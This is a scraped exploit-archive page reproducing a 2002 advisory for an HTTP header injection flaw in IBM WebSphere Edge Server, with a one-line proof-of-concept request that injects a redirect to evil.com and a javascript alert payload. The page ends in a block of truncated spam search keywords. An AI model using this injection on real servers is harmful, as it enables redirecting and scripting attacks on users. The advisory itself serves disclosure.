about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IBM Websphere Edge Server HTTP Header Injection Vulnerability


Title IBM Websphere Edge Server HTTP Header Injection Vulnerability
Published 2002-10-23-12:00AM
Updated 2002-10-24-01:17PM
Class Input Validation Error
CVE   CAN-2002-1168
Remote  Yes
Local  No
Credit  Vulnerability announced in a Rapid 7 advisory.
Vulnerable  IBM WebSphere Caching Proxy Server 4.0
IBM WebSphere Edge Server 2.0
IBM WebSphere Caching Proxy Server 3.6
Not Vulnerable  
Code   The following proof of concept has been supplied by Rapid 7:

GET /%0a%0dLocation:%20http://www.evil.com/"><img%20src="javascript:alert
(document.domain)">HTTP/1.0
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 07:58:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
meqantr.co Www.big as phpmyadmin Cards Cent www.89sex. sex.89.com www.kareen www.szpbx. www.mqdm.n Hrithikros www.bagtre news for c bollywood. www.cc129. maxcpm.inf phpwebthin wallpaper bollywood. /modifyfor Hot and se /modifyfor Photokorn nikto 200 /compo IPB%2520ex 16y www.americ Vidio boke omnipcx en gallry sex news for c Sexy dream free sexy pilayboy free sexy Www.chinas hot sexy v Mike tyson Www.18 yea WMV exploi sexxi vedi openssh3.6 Register www.zaocan htyyy CMS is Fre www.yoyo20 200 /compo www.qiangt Gambartela